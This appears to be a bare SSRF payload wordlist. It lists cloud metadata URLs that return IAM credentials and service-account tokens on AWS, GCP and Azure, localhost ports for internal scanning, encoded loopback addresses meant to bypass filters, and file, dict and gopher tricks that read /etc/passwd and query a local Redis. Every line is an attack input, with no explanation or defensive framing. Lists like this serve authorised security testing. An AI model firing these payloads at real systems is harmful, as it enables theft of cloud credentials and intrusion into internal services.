# SSRF (Server-Side Request Forgery) Payloads
# AWS metadata service
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/api/token
# GCP metadata
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token
# DigitalOcean metadata
http://169.254.169.254/metadata/v1/
# Internal service scanning
http://127.0.0.1:80
http://127.0.0.1:8080
http://127.0.0.1:443
http://localhost:3000
http://0.0.0.0:80
# IP encoding bypasses
http://0x7f000001/
http://2130706433/
http://017700000001/
http://[::1]/
http://0177.0.0.1/
http://0x7f.0x0.0x0.0x1/
# Protocol tricks
file:///etc/passwd
dict://127.0.0.1:6379/info
gopher://127.0.0.1:6379/_INFO
